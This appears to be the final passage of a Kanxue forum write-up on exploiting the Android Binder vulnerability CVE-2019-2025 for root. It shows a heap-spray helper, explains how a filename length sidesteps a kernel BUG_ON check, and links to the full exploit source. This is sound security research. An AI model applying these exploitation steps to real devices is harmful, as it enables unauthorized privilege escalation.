Figure 7 is taken from "D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou" [1].
As the figure shows, async_transaction is overlaid by exactly the value of name_len, so I set name_len to 8, which leaves async_transaction at 0 -- and that is where abcd.txt (length 8) comes from; see the bit sketch after the code below.
void init_fd_heap_spray()
{
    const char * path = "/data/local/tmp/test_dir/abcd.txt";
        fd_heap_spray = open(path, O_WRONLY);
    if (fd_heap_spray < 0)
    {
        printf("[-] fd_heap_spray failed\n");
    }
}
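To make the bit-level claim concrete (assuming the usual little-endian bitfield layout, where free, allow_user_free and async_transaction are the three lowest bits of the word that name_len overlays):
/* name_len = strlen("abcd.txt") = 8 = 0b1000
 *
 *   bit 0 (free)              = 0
 *   bit 1 (allow_user_free)   = 0
 *   bit 2 (async_transaction) = 0   -> BUG_ON(t->buffer->async_transaction != 0) does not fire
 */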

V. The Obligatory Screenshot
Acknowledgements:
Thanks to @牛maomao for many constructive suggestions on the exploitation details, which also made me acutely aware of the gap between myself and the real experts.
Source code:
https://github.com/jltxgcy/CVE_2019_2025_EXP

References:

[1] https://conference.hitb.org/hitbsecconf2019ams/materials/D2T2%20-%20Binder%20-%20The%20Bridge%20to%20Root%20-%20Hongli%20Han%20&%20Mingjian%20Zhou.pdf

[2] http://blogs.360.cn/post/Binder_Kernel_Vul_CH.html

[3] [原创] (Android Root) CVE-2017-7533 漏洞分析和复现, https://bbs.pediy.com/thread-248481.htm

[4] [分享] KSMA -- Android 通用 Root 技术, https://bbs.pediy.com/thread-248444.htm
- End -

Kanxue forum ID: jltxgcy

https://bbs.pediy.com/user-620204.htm

*This article was originally written by jltxgcy for the Kanxue forum; when reposting, please credit the Kanxue community.

